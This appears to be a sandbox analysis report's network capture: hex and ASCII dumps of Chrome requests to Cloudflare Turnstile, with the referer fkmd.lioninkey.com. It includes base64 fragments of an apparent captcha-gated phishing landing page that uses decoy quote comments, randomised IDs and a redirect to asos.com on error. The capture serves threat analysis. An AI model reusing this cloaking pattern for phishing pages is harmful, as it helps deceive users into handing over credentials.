                                                                                                                                                                                                                                                                                      Data Ascii: Nvcy5jb20nKTsNCiAgICB9DQogICAgfSkNCiAgICAuY2F0Y2goZXJyb3IgPT4gew0KICAgIHdpbmRvdy5sb2NhdGlvbi5yZXBsYWNlKCdodHRwczovL3d3dy5hc29zLmNvbScpOw0KICAgIH0pOw0KfQ0KPC9zY3JpcHQ+DQo8IS0tIEkgZmluZCB0aGF0IHRoZSBoYXJkZXIgSSB3b3JrLCB0aGUgbW9yZSBsdWNrIEkgc2VlbSB0byBoYXZlL
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47 78 6c 62 6d 64 6c 63 79 35 6a 62 47 39 31 5a 47 5a 73 59 58 4a 6c 4c 6d 4e 76 62 53 39 30 64 58 4a 75 63 33 52 70 62 47 55 76 64 6a 41 76 59 58 42 70 4c 6d 70 7a 50 33 4a 6c 62 6d 52 6c 63 6a 31 6c 65 48 42 73 61 57 4e
                                                                                                                                                                                                                                                                                      Data Ascii: IGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWN
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 48 51 36 49 47 46 31 64 47 38 37 62 57 46 79 5a 32 6c 75 4c 57 78 6c 5a 6e 51 36 49 47 46 31 64 47 38 37 66 51 30 4b 49 31 70 36 53 30 78 31 52 33 5a 36 59 31 6f 67 4c 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 48 74 30 5a 58 68 30 4c 57 46 73 61 57 64 75 4f 69 42 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 6b 42 74 5a 57 52 70 59 53 41 6f 62 57 6c 75 4c 58 64 70 5a 48 52 6f 4f 6a 6b 35 4d 6e 42 34 4b 58 73 4e 43 69 4e 61 65 6b 74 4d 64 55 64 32 65 6d 4e 61 49 43 35 6a 62 32 77 74 62 47 63 74 4e 48 74 6d 62 47 56 34 4f 6a 41 67 4d 43 42 68 64 58 52 76 4f 33 64 70 5a 48 52 6f 4f 6a 4d 7a 4c 6a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4a 54 74 39 44 51 70 39 44 51 6f 6a 57 6e 70 4c 54 48 56 48 64 6e 70 6a 57 69 41 75 5a 47 6c 7a
                                                                                                                                                                                                                                                                                      Data Ascii: HQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI1p6S0x1R3Z6Y1ogLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiNaektMdUd2emNaIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojWnpLTHVHdnpjWiAuZGlz
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:40 UTC1369INData Raw: 4a 6c 61 47 46 32 61 57 39 79 4f 69 42 6a 62 32 35 30 59 57 6c 75 4f 79 49 2b 44 51 6f 38 49 53 30 74 49 46 4e 31 59 32 4e 6c 63 33 4d 67 61 58 4d 67 62 6d 39 30 49 47 5a 70 62 6d 46 73 4c 43 42 6d 59 57 6c 73 64 58 4a 6c 49 47 6c 7a 49 47 35 76 64 43 42 6d 59 58 52 68 62 44 6f 67 53 58 51 67 61 58 4d 67 64 47 68 6c 49 47 4e 76 64 58 4a 68 5a 32 55 67 64 47 38 67 59 32 39 75 64 47 6c 75 64 57 55 67 64 47 68 68 64 43 42 6a 62 33 56 75 64 48 4d 75 49 43 30 74 50 67 6f 38 5a 47 6c 32 49 47 6c 6b 50 53 4a 61 65 6b 74 4d 64 55 64 32 65 6d 4e 61 49 69 42 6a 62 47 46 7a 63 7a 30 69 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 49 69 50 67 30 4b 50 47 52 70 64 69 42 70 5a 44 30 69 55 30 6c 73 61 55 64 6a 53 32 70 54 56 79 49 67 59 32 78 68 63
                                                                                                                                                                                                                                                                                      Data Ascii: JlaGF2aW9yOiBjb250YWluOyI+DQo8IS0tIFN1Y2Nlc3MgaXMgbm90IGZpbmFsLCBmYWlsdXJlIGlzIG5vdCBmYXRhbDogSXQgaXMgdGhlIGNvdXJhZ2UgdG8gY29udGludWUgdGhhdCBjb3VudHMuIC0tPgo8ZGl2IGlkPSJaektMdUd2emNaIiBjbGFzcz0iY2FwdGNoYS1jb250YWluZXIiPg0KPGRpdiBpZD0iU0lsaUdjS2pTVyIgY2xhc


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      38192.168.2.1649777104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC801OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:41 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 26446
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                      content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                                                                                      cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                                                      cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                      origin-agent-cluster: ?1
                                                                                                                                                                                                                                                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                      referrer-policy: same-origin
                                                                                                                                                                                                                                                                                      document-policy: js-profiling
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 37 64 34 36 38 35 65 64 62 66 32 65 36 34 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: Server: cloudflareCF-RAY: 8d7d4685edbf2e64-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64
                                                                                                                                                                                                                                                                                      Data Ascii: ding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiased
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23 30
                                                                                                                                                                                                                                                                                      Data Ascii: troke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#0
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f
                                                                                                                                                                                                                                                                                      Data Ascii: nge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-o
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e
                                                                                                                                                                                                                                                                                      Data Ascii: .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-lin
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23 66
                                                                                                                                                                                                                                                                                      Data Ascii: fset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#f
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65 69
                                                                                                                                                                                                                                                                                      Data Ascii: low:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{hei
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69 66
                                                                                                                                                                                                                                                                                      Data Ascii: rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justif
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:41 UTC1369INData Raw: 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69
                                                                                                                                                                                                                                                                                      Data Ascii: ext-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-li


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      39192.168.2.1649778104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:42 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7d4685edbf2e64&lang=auto HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/pbjvg/0x4AAAAAAAxU5YQo4UeBLOJu/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:42 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:06:42 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 119783
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d468bbf9b46de-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:42 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 76 45 73 72 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70
                                                                                                                                                                                                                                                                                      Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.vEsr2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcep
                                                                                                                                                                                                                                                                                      2024-10-24 22:06:42 UTC1369INData Raw: 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65
